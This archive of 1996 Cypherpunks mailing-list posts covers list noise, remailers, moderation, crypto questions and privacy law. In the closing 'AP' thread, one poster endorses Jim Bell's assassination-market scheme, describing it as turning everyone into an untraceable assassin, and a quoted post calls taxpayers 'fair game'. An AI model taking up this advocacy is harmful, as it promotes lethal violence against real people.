> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Wed, 25 Sep 1996 03:08:21 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: List participation (noise)
Message-ID: <n1368559043.24343@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know why you guys rank on Tim May so much.  Sure, he goes off topic
sometimes.  Hell, THIS MESSAGE IS OFF TOPIC AS IS THE MESSAGE I'M REPLYING TO!

Get the point?  Today, I had to delete more than 15 messages related to 
telling everyone how much of an asshole Tim is because he speaks off topic.
Hello?  Aren't these blatent (and I feel totally unwarranted) flames off 
topic?  I think everyone should take a step back and look what's happening
here.  Everyone is so eager to point fingers, and they don't look at the
fact that when you first get to your mail in the morning, there are over
100, even over 150 messages waiting for you!  Of course, after deleting all
of the noise (Thank God that damned TWA thread finally died!), you have
maybe 50 messages you have to skim through, of which maybe 10 or 20 survive
and go to the archive list of useful information.

Maybe I should just stay out of it, but I feel these constant flamings of
Tim are horribly wrong, and I've been ignoring the fact that I have to 
delete 20 messages about him every day for the past week.  I actually find
a lot of his postings interesting.  Yes, half of his postings get the 
insta-delete-never-even-considered-for-reading treatment, but I just 
read an insightful message about "provably hard cryptosystems."  
Cryptosystems-  Hm.  Imagine that.  Cryptosystems mentioned on a list
call "Cypherpunks."  ... And I thought it was the "Fuck the CIA, let's
spread rumors about the US military shooting down commercial airliners
out of New York, spam the spammers, kiddie-porn-on-the-net" discussion
group...

And now the disclaimer...
Even with all of the noise, there is a lot of good information on this
list, but my delete key is wearing out!  :-)

And please, if you don't have anything important to say, don't say anything.
Posting noise does nothing but generate more noise (Hm... I wonder how
much I've just generated! :-)

Patrick
_______________________________________________________________________________
From: Eric Hughes on Tue, Sep 24, 1996 6:38
Subject: List participation
To: cypherpunks@TOAD.COM

I have been informed that Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com> wrote:
> [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore,
> Rich Salz, and many other former valuable contributors off the
> mailing list [...]

As for me, I stopped having time to read cypherpunks a year and a half ago.
Tim had nothing to do with it.  The cypherpunks list has changed and I have
changed; so be it.

Eric


------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;24 Sep 1996 06:38:22 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Tue, 24 Sep 1996 10:35:50 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id KAA22337 for
cypherpunks-outgoing; Mon, 23 Sep 1996 10:23:04 -0700 (PDT)
Received: from flamingo.sac.net (flamingo.sac.net [207.33.88.33]) by toad.com
(8.7.5/8.7.3) with SMTP id KAA22323 for <cypherpunks@toad.com>; Mon, 23 Sep
1996 10:22:55 -0700 (PDT)
Received: from mango.sac.net (mango.sac.net [207.33.88.36]) by
flamingo.sac.net (8.6.12/8.6.12) with SMTP id KAA10771 for
<cypherpunks@toad.com>; Mon, 23 Sep 1996 10:21:54 -0700
Message-Id: <2.2.32.19960923172509.00d6e4e4@flamingo.remailer.net>
X-Sender: eric@flamingo.remailer.net
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 23 Sep 1996 10:25:09 -0700
To: cypherpunks@TOAD.COM
From: Eric Hughes <eric@sac.net>
Subject: List participation
Sender: owner-cypherpunks@TOAD.COM
Precedence: bulk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 25 Sep 1996 08:05:04 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <Pine.SUN.3.91.960923194435.15255A-100000@crl2.crl.com>
Message-ID: <Pine.OSF.3.91.960924111148.8825A-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



HERE, HERE!

On Mon, 23 Sep 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > There is no such thing as an "ordinary citizen". When the U.S. commits
> > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere,
> > every American taxpayer is an accomplice and a fair game.
> 
> Illogical collectivist claptrap.  When a taxpayer is targeted by 
> terrorists, he has been victimized twice--first by the government 
> that stole his money, second by the terrorist that punished him
> for the (alleged) acts others commited with that money.  If a
> mugger buys a gun with the money he took from me, am I then
> responsible for the murder he commits with it?  Clearly not.  
> This line of "reasoning" is nothing more than a sad variant of 
> the old, "blame the victim" game.  For shame.
> 
> Let's bring this back to crypto for a moment.  Dimitri's "logic"
> must necessarily lead one to the conclusion that Cypherpunks (at
> least those in the US) are responsible for whatever draconian
> restrictions "our" government puts on free speech, crypto or
> whatever.  John Gilmore, Philip Zimmermann, Whit Diffie and 
> others will be chagrined to learn this, I'm sure.
> 
> Dimitri needs to learn what it means to be an adult.  Everyone is 
> totally responsible for what they do, but ONLY for what THEY do.  
> No one is responsible for the unassisted, willful acts of others.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 06:48:21 +0800
To: cypherpunks@toad.com
Subject: The Nature of the Cypherpunks List
Message-ID: <ae6d639401021004d1fd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



(Note: This started out as a comment on why I've been mostly silent during
this latest of several efforts to disrupt the list, but I segued into a
discussion of what this list talks about, and why, and why it can never be
all things to all people. Pardon the length, but these are things I feel
the need to say. Astute readers who've been on the list for several years
will know that I've written a few other essays like this, usually about one
per year. I suppose I should try to find my older essays and repost them,
but I rarely repost old articles anymore....)

THE LATEST ATTEMPT TO DISRUPT THE LIST

I've been keeping my mouth shut lately on this whole
Vulis--spam--Timmy--etc. thing, figuring that the one thing Vulis really
wants to see is the list distracted by endless back-and-forth about whether
"Timmy" really does the things Vulis and his "tentacles" claim, whether the
list should be closed to non-subscribers, and on and on.

But there comes a point where I need to speak up. (By the way, somebody
even sent me a bizarre message, saying: "I am not quite sure why you have
not shot back at Dr Virmin and his cause. Maybe that is the best way? Or
are you guilty as charged?" So, to some, my silence means I might be
guilty. Jeesh.)


LET'S NOT BLOCK NONSUBSCRIBERS!

A few comments on one of the recent messages:

At 3:51 PM 9/24/96, Ray Arachelian wrote:

>There is no reason we can't allow posts from those who are not subscribed
>to the list.  There's also no reason that we can't have someone moderate
>those posts before they make it to the list to remove the spams - mind
>you not to moderate the contents, but to remove repeating annoying spam
>and advertisement.

Blocking posts from non-subscribers would of course block all anonymous
posts, something I don't think the Cypherpunks would be setting a good
precedent in doing! Not only are most (all?) of the existing remailers
essentially "our technology," but we believe (as an emergent consensus)
that anonymous and pseudonymous speech is a Good Thing. "Cypherpunks block
anonymous posts" would not be a good message to send, especially in these
perilous times.

(Sure, there are some workarounds. Stable nyms could be subscribed, as
Black Unicorn and Lucky Green demonstrate. And nyms through nymservers. But
not trivially, to add additional "allowed subscribers" without also sending
them copies of messages.)

MODERATION CONSIDERED HARMFUL

As to moderation, let's nuke this idea right now. I know of no moderated
list, except perhaps "RISKS," that's an improvement of unmoderated, open
versions. (And RISKS is the personal project of Peter Neumann, who puts
incredible effort into keeping it on track...I no of no person on our list
who could or would do the same job, though I suspect some would jump at the
chance to volunteer to do so, then probably let things fizzle out....)

...

NO DEFENSE NEEDED

On defending _me_ against the charges of Vulis and (one has to presume) his
anonymous "Timmy warnings," don't bother. Please, don't bother. I don't
need testimonials from others or votes of support. It just adds to the
noise.

If Vulis is ignored, he'll likely eventually go away, as some other
well-known net.personalities have done. (Vulis claims we "drove away" Rich
Salz, John Gilmore, Eric Hughes, etc. But do we then get credit for
"driving away" Dr. Fred C. Cohen, Dr. David Sternlight, and Lawrence
Detweiler? Fair is fair, after all. Not that I think the decisions people
make to remain on mailing lists or in discussions, or in marriages for that
matter, are usually the fault of others.)


THE NATURE OF THE CYPHERPUNKS LIST

Look, this list now has something like 1400 subscribers, according to
something someone posted a few weeks ago. (I suspect at least a few hundred
of those names are merely passive reflectors. And I certainly only "see" a
few hundred names appearing here as posters, and only a few dozen as
_active voices_ in debates. So I tend to view the list as being a few
hundred moderately active readers, with the other thousand or so as
nonsubscribers, effectively.)

With hundreds of active readers, all sorts of things will get said. Some
bizarre, some insulting, some insightful, some tangential, etc. Some of
them are not liked by Vulis, some not like by Perry Metzger, some not liked
by me. And as Eric Hughes noted, the list changes, and we change. Certainly
the topics of today cannot be the same fresh, new topics of four years ago,
when many of the basics were being discussed for the first time. Perforce,
the list talks about things of current interest---the security measures in
the wake of TWA 800 are a perfectly good, list-related topic. This is just
one example, of many.

While some folks would rather we talked only about "crypto," just how many
times can basic questions about Diffie-Hellman, or RSA, or elliptic curves
be discussed? At some point these issues become esoteric research topics,
and are unlikely to be casually discussed on a mailing list such as ours.
(And many of the ostensibly on-topic pure crypto questions are actually
just banal questions about topics covered in any crypto textbooks! Which is
not surprising, actually.)

THE RAISON D'ETRE FOR CYPHERPUNKS

And as I was there at the initial planning meeting in July of '92, and then
at the first physical meeting, I can assure you that what soon became
"Cypherpunks" was never intended to be an announcement list for research
discoveries in mathematical cryptography! Much as some have been shrilly
claiming "This list is for crypto and programming discussions only," this
was *never* the intent. And, judging from the topics people have brought up
over the past four years, the constituency for _only_ talking about
mathematical cryptography and programming issues appears to be rather
small. Nothing is stopping those who call for discussing only crypto and
programming to do exactly that: discuss only crypto and programming.

The serious crypto researchers, e.g., the Matt Blazes, the Whit Diffies,
and the Carl Ellisons of the world, have various channels they use to
communicate in. Conferences several times a year, limited mailing lists,
other channels, etc. That they have all been members of the Cypherpunks
list but are not any longer is their choice. There are lots of reasons
people make the decision they can't cope with another mailing list, or that
filtering it is taking too long, etc. For one thing, in the past few years
the explosion of the Web and increased interest in things cryptographic has
made it more difficult to find time for any of the channels of
communication to be followed. And, as I noted, some of the discussions
which were "fresh" a few years ago no longer are.

This last point is not something any forum can do much about. Just as there
are certain ecological truths about "large, hungry predators are never
numerous," so, too, are there basic information-theoretic truths about the
decline in freshness of topics: "not everything remains fresh and new
forever."


REAPING THE HARVEST

When the Cypherpunks group and list got started, we reaped the harvest of
work done from the mid-70s to the early 90s, with basic encryption (1976),
secret-sharing (1980), digital mixes (1981), digital cash (1985), and
various other abstract results ready to be *combined* with the parallel
development of the Net, e-mail, Perl, and the Bay Area hacker community
(from whom Eric and I drew for the organization of our first
gathering...the response was tremendous).

We felt there was a golden opportunity to take some of the academic
research in the cryptographic community and "deploy" it on the Net. Deploy
it in furtherance of various stated and unstated political and social
beliefs we had. (I was a vocal libertarian, part of the
"techno-libertarian" vanguard. Eric was less closely associated with
libertarianism, though his actions were certainly consistent with this
outlook. John Gilmore was, well, John. Active in forming the EFF and in
fighting for various causes. Hugh Daniel, another early founder, was also a
long-term activist in hypertext, networking, and libertarian issues. So,
the several of us were much interested in deploying cryptographic protocols
to implement interesting new social and political possibilities...at the
very first meeting there were exciting discussions about new banking
systems, an Italian scheme where the survivor of an N-person group gets a
payoff (and we discussed how this could be implemented with Chaumian
digicash), remailers (we tested models for remailers, and the Hughes/Finney
remailer appeared within a month or two), and so on.)

(Having attended the Crypto conference (in 1988), and having read "The
Journal of Cryptology," the Eurocrypt, Asiacrypt, and Crypto Proceedings, I
can tell you that the first Cypherpunks meeting (not named by Jude Milhon
for another month or two) had a dramatically different "feel" to it. It was
_not_ just another forum for releasing research results, or for discussing
Unix hacks.)


"YOU GUYS ARE JUST A BUNCH OF CYPHERPUNKS"

As we talked about what we were doing, and who we were, various names
popped up. "The Crypto Freedom League." "Privacy Hackers." "The Crypto
Cabal." And so on. Jude Milhon's "You guys are just a bunch of
cypherpunks," a wonderful pun on "cyberpunk" and the British spelling of
"cipher," was accepted by acclamation. Though "punk" has some negative
connotations, so do nice, staid names like "The Foundation for Unrestricted
Cryptography," or "The Crypto Programmer's League."

(We've had debates on the suitability of the name at least half a dozen
times over the years. It ain't gonna change. The most that could happen is
that some faction would claim to be the One True Faction and would call
themselves by something more respectable (or less respectable, I guess).
But the rest of us would still be Cypherpunks. Get used to it. Too late to
change now.)


THE INEVITABLE DECLINE IN FRESHNESS OF TOPICS

Over the years, as remailers got deployed, as PGP spread, as "crypto"
appeared more and more often in the popular press, the topics which were
once so new and fresh inevitably had been through many, many cycles of
discussion. We had 10 rounds of discussion of DC-Nets, 7 rounds of
discussion of random number generators, 11 rounds of discussions of whether
the NSA reads all mail, and so on. Not much can be done about this...new
people join the list and ask questions, old-timers jump in with
speculations, and sometimes news events trigger a debate.

How else could it be? A moderated list with only announcements of new
results? (This would likely generate about two messages per week, tops, and
such a list would have few subscribers, and no interesting debate. Also,
plenty of other fora exist for this, including the Usenet itself, e.g.,
sci.crypt.research.)


WHAT IT IS

No, for all its noise and faults, the list is what it is. Not perfect, but,
then, few things are. And about as good as I've seen. (I've been on several
other mailing lists, and the usual death of lists comes from disinterest
and boredom, not from overuse. Filters are able to remove noise, but
filters can't add signal.)

That's all I have to say for now. By all means, try to contribute signal.
But don't carp about how low the S/N ratio is, and don't carp about
worthless messages. And don't chime in with unneeded "defenses" of me or
anyone else attacked by kooks and nebbishes.

--Tim May, whose reputation is, like the list, whatever it is, for whatever
reasons, and who thus needs no defenders



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 25 Sep 1996 06:22:07 +0800
To: "'cypherpunks@toad.com>
Subject: RE: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960924182142Z-41928@mail.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	hallam@vesuvius.ai.mit.edu

If you don't very clearly reject his murderous ideas you are going to
regret it
just as the left regreted having the USSR or the RAF associated with
them.
........................................................................
...........


They wouldn't have to be repudiated in public.  
They could be repudiated in private,
and he would never know what hit'im.
<joke>


There's so much hypocricy in the world, anyway, with groups not doing
what they say or not saying what they really do, how can anyone believe
what any group claims to believe in unless and until they engage in some
kind of action.   You might as well spend your time believing John
Anonymous MacDonald.  It's best to be prepared to defend yourself
against anyone, regardless of what virtuous conduct they claim to
believe in.

   ..
Blanc
>
>
>		
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Wed, 25 Sep 1996 03:24:32 +0800
To: m5@tivoli.com
Subject: Re: Bork book
Message-ID: <199609241525.IAA01531@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:44 AM 9/24/96 -0500, you wrote:
>Robert Bork was on NBC (I think) being interviewed to plug his hot
>new book "Slouching Towards Gomorrah" (or something like that). 
>
>Bork came across as kind-of a jerk, personality-wise.
>-- 

Heard him on Limbaugh pushing hard for censorship as a cure for society's
problems.
Looks like Ted Kennedy & Co. were right to keep him off the court.

Marc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 25 Sep 1996 08:09:19 +0800
To: cypherpunks@toad.com
Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto!
Message-ID: <199609241649.LAA22238@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I just recently downloaded copies of Blowfish & Ghost.

Does anyone have any experiance with these two algorithims?

How do they comare to RSA, DES, 3DES, IDEA ?

I can across a post awhile back that mentioned that they were using Blowfish in
PGPPhone. Can anyone confirm this?

Does anyone know how they are using Blowfish and why?

Thanks,

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 25 Sep 1996 06:20:22 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Public Schools
In-Reply-To: <Pine.OSF.3.91.960923105254.11469A-100000@francis.tenet.edu>
Message-ID: <199609241652.LAA22261@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.OSF.3.91.960923105254.11469A-100000@francis.tenet.edu>, on 09/23/96 at 11:00
AM,
   Dan Harmon <harmon@tenet.edu> said:

> 
>One of the hardest things that we have to work hardest to counter-act 
>with our twins, who attend PS, is the socialization they 
>pick up at school.

There is an easy solution to that problem, it's called home school. :)


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 25 Sep 1996 03:55:02 +0800
To: Daniel Miskell <DMiskell@envirolink.org>
Subject: Re: Banning annoying users
In-Reply-To: <199609241158.HAA27269@envirolink.org>
Message-ID: <Pine.SUN.3.91.960924114623.13326A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Daniel Miskell wrote:

> The
> not allowing unsubscribed individuals to post is logical, for a time.  But
> that basically outlaws anon remailers that don't allow you to send to an
> account, and a lot of them don't, from my limited understanding.  Besides, if
> we set up the list to ban people who are 'undesirable', instead of just using
> our own killfiles to do the dirty work for the list, then what is to stop
> someone from banning you?  Sure, you move on to another list, but, personally,
> I wouldn't want it done to me, and so I would not do it to someone else.  But,
> like I said, personal killfiles are more than encouraged.  It resolves these
> kinds of conflicts a lot faster and cleaner than debating who and who should
> not be banned.


This is wonderful in theory -- and in practice up until now, but what 
happens when someone decides "Oh, I hate this list and Tim, let me write 
a spam bot to anonymously spam the this into oblivion?"  There is such a 
thing as denial of service via spamming.  It's quite easy to do for 
someone who knows how to run sendmail and knows how to write a shell 
script or a small program.  Hell, I could write one of those in less than 
1 minute.

As for me being banned, I doubt it, I'm not posting daily Tim warnings 
and such spams.  yeah, banning someone off the list for their political 
or even crypto views is silly.  Banning someone for spamming is another 
issue.

There is no reason we can't allow posts from those who are not subscribed 
to the list.  There's also no reason that we can't have someone moderate 
those posts before they make it to the list to remove the spams - mind 
you not to moderate the contents, but to remove repeating annoying spam 
and advertisement.

As for me, I don't personally give a shit, for as long as assholes like 
John Anonymous Mac keeps posting "Tim Warnings" I get more users on my 
filtered cypherpunks list. :)  But it's getting really old.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 25 Sep 1996 07:04:05 +0800
To: remailer-operators@c2.org
Subject: Portal remailer shutting down
Message-ID: <199609241903.MAA20095@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The ISP which I have used for over five years, portal.com, is going
out of business at the end of this month (September, 1996).  This means
that my remailer at hfinney@shell.portal.com will cease operations.
I had asked that it be removed from the remailer lists a few weeks ago
due to some problems, so hopefully not many people have been using it
lately.  But now it will go away for good.

This remailer has been in operation since the fall of 1991.  I believe it
has been the longest continually running remailer on the net.  It was one
of the first "cypherpunk" remailers, based on Eric Hughes' code, to which
I added support for PGP messages.  (Actually there was a remailer running
out of Australia for a short time earlier in 1991 which was the first to
use PGP.  It was a very nice system but got shut down supposedly due to
traffic concerns, although there seemed to be some politics involved as
well.)

I have also been running a remailer from my account at
hal@alumni.caltech.edu.  However that one cannot tolerate abuse
complaints, hence I have been forwarding all mail out of that remailer
through the portal one, for a number of years.   Now that Portal is gone,
this will be a problem.  I plan to restrict the alumni remailer to only
send mail to other addresses on a fixed list, which will initially be
just the other remailers.  That way the remailer can be used to form
chains, but not to send to end users.  This limited functionality should
still be useful.

It may be possible to create a web page where people can sign up to say
they would not object to receiving anonymous mail.  Most people are
open minded and curious enough that they wouldn't mind signing such a
list.  Make it easy enough and you will collect thousands of names.  Now
people who want to create nyms using remailer chains for return addresses
can add their names to the list without feeling that they are
compromising their identity.  They can use a remailer which only sends to
people on the list as the last remailer in their chain, with some
confidence that the remailer is unlikely to be shut down due to abuse
complaints.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 25 Sep 1996 05:48:51 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: LACC: Re: Australia now has information police
In-Reply-To: <199609220643.QAA13076@suburbia.net>
Message-ID: <Pine.A32.3.91.960924122022.12846A-100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 22 Sep 1996, Julian Assange wrote:

> [re COCOM trade agreements]
> 
> All COCOM countries most likely. That said Australia does not seem to be

Didn't the COCOM treaty expire?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 25 Sep 1996 07:02:22 +0800
To: Jim McCoy <mccoy@communities.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <v03007801ae6bf1788684@[204.179.128.16]>
Message-ID: <Pine.A32.3.91.960924125437.13006A-100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 22 Sep 1996, Jim McCoy wrote:

> Brian Davis <bdavis@thepoint.net>
> [...]
> >Constitutional literalists take note:  the First Amendment says nothing
> >about what the executive branch or the states can do ....
Doesn't the doctrine of limited powers mean that they cannot do what is not
specified? (If I'm not mistaken, IANAL, etc...)
 
> The states are prohibited through the 14th Amendment via the
> Slaughterhouse cases, the ability of the executive branch to
> violate due process is questionable (from a legal viewpoint, not
> a practical one...the President cannot order you placed in jail
> unless you have broken a law which requires congress to have
> made the law in the first place...)

And the ITARs are only executive orders, no? Not laws, right? I'm curious 
as to why they're considered valid. Anyone know?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 16:10:54 +0800
To: cypherpunks@toad.com
Subject: Re: ISPs' information on users
Message-ID: <ae6df1260502100417f8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:18 PM 9/24/96, Robert Hettinga wrote:
>--- begin forwarded text

>>  ------------------------------
>>  Brave Old World:
>>  Reflections on Europe in the Digital Age
>>  by Steven Carlson; 20 Sep 1996
>>  ------------------------------
>>
>>  ** So Much Fuss About A Bottle Of Ketchup
>>
>>  Hungarian police recently sent a fax around to the local Internet
>>  service providers (ISPs) asking them to provide lists of their users
>>  in Esztergom, a small town outside of Budapest. It seems somebody
>>  had planted a bomb in a bottle of ketchup. Since everyone knows you
>>  can download bomb-making instructions from the Internet, the police
>>  figured they should investigate the local users. No, I'm not making
>>  this up.

So, Hungary has GAK -- Government Access to Ketchup.

Good to know the 57 Varieties are now considered munitions.

On a more serious note, perhaps legal experts here could comment on
something I've been wondering about. Could ISPs in the UlS. be compelled to
report on the browsing and net surfing habits of their customer base?

To make this clear, I don't mean in a specific criminal case, where the
records are searchable under a warrant. I mean a blanket order that all
ISPs compile and forward records.

Were I an ISP, I would probably say, "Hell no! They're my records and the
Fourth Amendment says my records are to be secure unless a proper court
order is issued. Besides, my fee for generating each kilobyte of records is
$100,000, nonnegotiable."

(I think I've answered my own question, namely, ISPs would be under no
obligation to report on customer activities, absent a proper warrant, and
consistent with the ECPA.)

However, ISPs are _not_ accorded the same status as priests, lawyers, and
others with such privacy privileges (and obligations). Would it be legal
for an ISP to offer for sale such records? Or to voluntarily go to the
cops?

(There's a certain new ISP with tight links to a quasi-religious group much
in the news lately, and some have speculated that this ISP may be
monitoring certain users....)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 25 Sep 1996 08:36:08 +0800
To: Dave Del Torto <ddt@LSD.com>
Subject: Re: Eudora 3 EMS API stuff
In-Reply-To: <v03010424ae6c801a5568@[192.187.167.52]>
Message-ID: <9609241818.AA00638@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Someone at qualcomm writes (forwarded by ddt@lsd.com):
>  Abstractly speaking, the EMS API is most suited for performing
>  transformations, conversions and some other forms of processing
>  on email messages as they are sent and received by Eudora.
>
>  In practice it is very useful for encryption, digital signatures,
>  and compression.

ahh, a classic instance of "crypto with a hole" ...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 25 Sep 1996 06:36:56 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <9609241723.AB00771@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


> At 05:48 PM 9/23/96 -0400, hallam@vesuvius.ai.mit.edu wrote:

> >When the IRA attemoted to assasinate my cousin I was in no
> >way intimidated and neither was he. He continued as a senior
> >poitician for over a decade despite continued danger. I can think
> >of no less effective method of bringing about change in attitudes.

I don't think you truly understood the *mechanism* of AP.  Your
cousin was threatened from an outside attack.  Protection is
relatively easy in that case.  AP generates a threath * within *
every * part * of every structure (family, work, friends, etc).  

As an analogy, when specialized demolishing team blows a building
down, they don't use one big charge, they use hundreds of them to
severe every load bearing member of the structure.  AP would work the
same, turning every person a potential motiveless assassin. I say
"motiveless" because AP makes the motive not traceable to peoples or
assets.

Some AP assassins will get caught, but it is predictable that it will
only be a minority and that with time, the percentage of caught
assassins will get smaller as more professionnal assassin gets
seriously into the business. 

JFA
Please reply by e-mail as I am not anymore on Cypherpunks. Thanks

Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 25 Sep 1996 07:25:28 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <9609241724.AB00771@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 23 Sep 96 at 22:10, hallam@vesuvius.ai.mit.edu wrote:


> People like Jim want to impose their will on others by
> force.

Mr. Bell pushing the AP scheme does not mean that he wants to impose his 
ideas by force since he will have *no* mean of controlling what ideas 
will be favored.  It is strictly market forces that will dictates 
what will happens.  As many, including Mr. Bell have pointed out, he 
might very well be one of the first victim of the AP system.

Mr Bell is pushing AP because he believe that the bulk of human race 
wants to live peacefully and he therefore concludes that AP, being 
led by the demand of ordinary people, will lead to a more peacefull 
world.  When you'll get to learn how AP operates, your conclusions of 
an AP regulated world will, IMO, be dependent on the specifics of 
your definition of human race.

> Despite prolonged attempts by each faction to assasinate the
> leaders of the other they have been unsuccessful.

As I mentionned in my other post to you, this is not a reference 
since the operating mode of AP is entirely different.


> If terrorists trained by Lybia and Syria are unable to assasinate
> at will then we can be sure thaqt Jim's band of kooks is not going
> to get any further.

Again, absolutely irrelevant to AP.  Go read the book again.
 
> It is suprising that someone from the press has not seized upon
